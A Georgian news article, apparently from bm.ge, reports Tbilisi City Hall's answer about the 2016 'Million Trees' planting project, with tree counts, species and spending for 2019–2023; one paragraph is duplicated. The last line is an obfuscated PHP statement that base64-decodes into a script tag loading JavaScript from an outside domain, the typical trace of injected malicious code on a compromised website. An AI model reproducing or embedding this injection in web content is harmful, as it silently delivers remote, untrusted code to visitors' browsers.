celsiusi
ავერსი საქკაბელი

2016 წელს, თბილისის იმდროინდელი მერის, დავით ნარმანიას ინიციატივით, დედაქალაქში, სხვადასხვა ადგილებზე მილიონი ხის პროექტის ფარგლებში ამდენივე ხე დაირგო. მოგვიანებით, ხეების ნაწილი გახმა, ნაწილი კი ახლით ჩანაცვლდა, რამდენად აქვს ინფორმაცია დედაქალაქის მოქმედ მთავრობას აღნიშნული პროექტის ფარგლებში დარგული ხეების შესახებ და რამდენი ხე ირგვება დედაქალაქში კახა კალაძის მერობის პირობებში - ამ კითხვებით bm.ge-მ თბილისის მერიას მიმართა.

BMG-ისთვის მოწოდებული საჯარო ინფორმაციიდან ირკვევა, რომ 2016 წელს დარგული მილიონი ხის შესახებ მერიას უკვე ინფორმაცია არ აქვს, რადგან მხოლოდ 5 წელი უვლიდნენ.

“პროექტი აღნიშნული სახელწოდებით [„მილიონი ხე“] აღარ მიმდინარეობს, თუმცა 2016 წლიდან დღემდე ქ. თბილისის მუნიციპალიტეტის მერია, დედაქალაქის ტერიტორიაზე აქტიურად ახორციელებს სხვადასხვა სახეობის ხე-მცენარეების რგვას. რაც შეეხება 2016 წელს დარგულ ხე-მცენარეებს, აღნიშნული ნარგავების მოვლა-პატრონობა ამ ეტაპზე აღარ ხორციელდება (გარდა ძლიერი ქარის დროს დაზიანებული მცენარეების აღდგენისა), ვინაიდან დედაქალაქის ტერიტორიაზე დარგული ახალგაზრდა ხე-მცენარის მოვლა-პატრონობა ხორციელდება 5 წლის განმავლობაში, რაც სრულიად საკმარისია, რომ ადაპტირდნენ ადგილობრივ ნიადაგურ და კლიმატურ პირობებთან.

2016 წელს დარგული ნერგებიდან, ნაწილი რაც გახმა ჩანაცვლდა მომდევნო წელს. რაც შეეხება ხმობის მიზეზს, აღნიშნული შეიძლება გამოწვეული იყოს კლიმატური ფაქტორებიდან და მავნებელ-დაავადებათა მავნე ზეგავლენისგან“, - ნათქვამია მერიის მიერ მოწოდებულ ინფორმაციაში.

2016 წელს დარგული ნერგებიდან, ნაწილი რაც გახმა ჩანაცვლდა მომდევნო წელს. რაც შეეხება ხმობის მიზეზს, აღნიშნული შეიძლება გამოწვეული იყოს კლიმატური ფაქტორებიდან და მავნებელ-დაავადებათა მავნე ზეგავლენისგან.

2019 წელს დაირგო 12 800 ძირი მაღალტანოვანი ( სიმაღლე 3მ და ზევით) და 7600 ძირი დაბალტანოვანი ( სიმაღლე 1,2 მ) ხე.
2020 წელს დაირგო 7 164 ძირი მაღალტანოვანი ( სიმაღლე 3მ და ზევით) და 9460 ძირი დაბალტანოვანი ( სიმაღლე 1,5 მ) ხე.
2021 წელს დაირგო 6 683 ძირი მაღალტანოვანი ( სიმაღლე 3მ და ზევით) და 10765 ძირი დაბალტანოვანი ( სიმაღლე 1,5 მ) ხე.
2022 წელს დაირგო 12 741 ძირი მაღალტანოვანი ( სიმაღლე 3მ და ზევით) და 13579 ძირი დაბალტანოვანი ( სიმაღლე 1,5 მ) ხე.
2023 წელს გამწვანების სამუშაოები აქტიურად მიმდინარეობს, ამ ეტაპზე დაირგო 3 240 ძირი მაღალტანოვანი (სიმაღლე 3მ და ზევით) ხე, ასევე წლის ბოლომდე იგეგმება 6 715 ძირი მაღალტანოვანი (სიმაღლე 3მ და ზევით) და 16 776 ძირი დაბალტანოვანი ( სიმაღლე 0,8 მ) ხის დარგვა.

2019 წელს ხეების დარგვისათვის დაიხარჯა - 7 245 196 ლარი.
2020 წელს ხეების დარგვისათვის დაიხარჯა - 4 868 021, 70 ლარი.
2021 წელს ხეების დარგვისათვის დაიხარჯა - 6 393 636, 97 ლარი.
2022 წელს ხეების დარგვისათვის დაიხარჯა - 6 832 180, 90 ლარი.
2023 წელს ხეების დარგვისათვის დაიხარჯება - 8 478 951, 00 ლარი.


ამასთან აღსანიშნავია, რომ გარდა ხეებისა 2019-2023 წლების პერიოდში, დაირგო რამდენიმე ასეული ათასი დიდი ზომის ბუჩქი და ბალახოვანი მცენარე.

დედაქალაქის ტერიტორიაზე ირგვება - აკაკის, თელის, არღავანის, ზეთის ხილის ხის, წაბლის, ნაძვის, კედრის, ვერხვის, მუხის, ტირიფის, სოფორას, სოჭის, ალბიციას, ხეტიტას, ნუშის, ხერკინას, იფანის, კვიპაროსის, გინკოს, ძელქვას, ვაშლის, ნეკერჩხლის, ჭადრის, მსხლის, მელიას, ცაცხვის, ამბრის ხის, უნაყოფო თუთის, ფიჭვის და სხვა სახეობის ნერგები.

დარგული ნერგების მოვლა-პატრონობას ახორციელებს შპს „ეკოსერვის ჯგუფი“. ნერგების დარგვიდან ერთი წლის განმავლობაში გახმობის შემთხვევაში, ხმელ ნერგებს კონტრაქტორი კომპანია საკუთარი სახსრებით ანაცვლებს ახლით (ჯანსაღით).

ქ. თბილისის მუნიციპალიტეტის მერიის მიერ დედაქალაქის ყველა რაიონში ეტაპობრივად მიმდინარეობს გამწვანებითი სამუშაოები. 

წყარო: BMG

241
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");